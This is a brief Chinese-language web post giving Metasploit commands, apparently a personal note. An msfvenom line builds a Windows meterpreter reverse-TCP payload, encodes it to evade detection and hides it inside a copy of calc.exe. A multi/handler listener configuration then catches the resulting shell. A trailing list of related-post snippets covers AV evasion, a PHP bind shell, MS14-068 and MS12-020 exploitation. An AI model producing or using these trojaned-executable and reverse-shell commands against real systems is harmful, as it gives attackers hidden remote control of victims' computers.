msf payload

#client
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=9999 -e x86/shikata_ga_nai -b ‘\x00‘ -x /root/demo/calc.exe -f exe > demo.exe

#server:
msfconsole
msf>
use exploit/multi/handler
set LHOST 192.168.8.106
set LPORT 9999
show options
exploit -z -j

时间: 2024-09-30 19:33:57

msf payload的相关文章

msf生成payload过滤

shellcode学习有两个方向,一个是专心研究跳板ROP之类,另一个是专心研究payload部分.为了分清楚最近的任务,所以先放弃研究shellcode,从msf上直接拿过来用了. 在看rop链的生成原理,都还好,在执行shellcode的时候,发现在执行过程中有问题.仔细查看了下布局之后,发现poc利用中对 bad chars 有截断,需要过滤.使用msfpayload模块默认生成的弹窗根本用不了啊,使用0day2上给的shellcode也是因为坏字符'0A'的存在. 所以只能使用过滤了.

php结合msf反弹内网shell

感谢: perl6大佬分享的姿势. MSF: msf > use payload/php/bind_phpmsf exploit(handler) > set PAYLOAD payload/php/bind_phpmsf exploit(handler) > set RHOST 目标内网ipmsf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就会在f盘生成xishaonian.php脚本一般都是需要修改

metasploit快速入门

今天没上班,在小黑屋里看了一个一百多页的书<metasploit新手指南>,在此将笔记分享给大家.欢迎大家批评指正,共同学习进步.   metasploit新手指南 笔记 kali 0x01 metapoit基本文件结构如下: config metasploit的环境配置信息,数据库配置信息 data渗透后模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 Db rails编译生成msf的web框架的数据库信息 Documentation 用户说明文档及开发文档 Extern

MS14-068域权限提升漏洞总结

0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票.银票是一张tgs,也就是一张服务票据.服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器.所以ms14-068的来源和银票是息息相关的. 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许域内任何一个普通用户,将自己提升至域管权限.微软给出的补丁是kb3011780.在server 2000以上的

Tips for Evading Anti-Virus

绕过杀毒软件,有许多钟方法.此处介绍一种,编写python程序调用shellcode,并使用Pyinstaler将python程序编译为exe程序. 准备工作:(Windows XP环境下编译) 将Python程序编译为exe,需要Python主程序,pywin32库,Pyinstaller(直接解压到C盘).如果编译过程中出现错误提示,请按照指示解决问题.安装过程不是很复杂,在此不予说明. https://www.python.org/ftp/python/2.7.8/python-2.7.8

Teensy HID攻击科普文

0x00 前言: 在2014年美国黑帽大会上,柏林SRLabs的安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为"BadUSB"(按照BadBIOS命名)的攻击方法.在认识BadUSB之前我们来先了解一种类似的攻击手法,使用Teensy芯片进行HID攻击,这种手法要古老的多,2010年左右,通过U盘伪装成为USB键盘输入恶意代码的攻击方式就已经相当成熟,并将这种攻击方式称为"Teensy HID攻击",Kautilya也是在20

小型网站渗透常规思路之抛砖引玉

首先,我们知道 .当我们得到一个目标后,当然目标只是针对小型网站的一个思路,大型网站又是另外一个思路了. 信息收集 首先要做的就是信息收集,正所谓磨刀不误砍柴功. 以下引用owasp 渗透指南4.0 版 搜索引擎信息发现和侦察 (OTG-INFO-001) 识别web服务器 (OTG-INFO-002) web服务器元文件信息发现 (OTG-INFO-003) 服务器应用应用枚举 (OTG-INFO-004) 评论信息发现 (OTG-INFO-005) 应用入口识别 (OTG-INFO-006)

metasploit 派生 shell

1. 前言 metasploit 获取的 shell 派生给其他工具,例如 Cobaltstrike 以 CVE-2017-8759 为例通过 msf 获取 shell 后派生给 Cobaltstrike 2. 环境 Kali : 192.168.229.143 win7 : 192.168.229.137 Cobaltstrike+jdk:链接:http://pan.baidu.com/s/1eSJ7P54 密码:krqn CVE-2017-8759-exp: https://github.c

MS12-020漏洞复现及自动化批量利用

漏洞描述 Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏.(RDP远程桌面执行代码漏洞) 影响目标 Windows XP sp3 Windows xp sp2 Windows Vista sp2 Windows 7 Windows Server 2003 Windows Server 2008 Windows Server 2008 R2 msfpayload利用 msfconsole use auxiliary/dos/windows/rdp/ms12_020_maxchann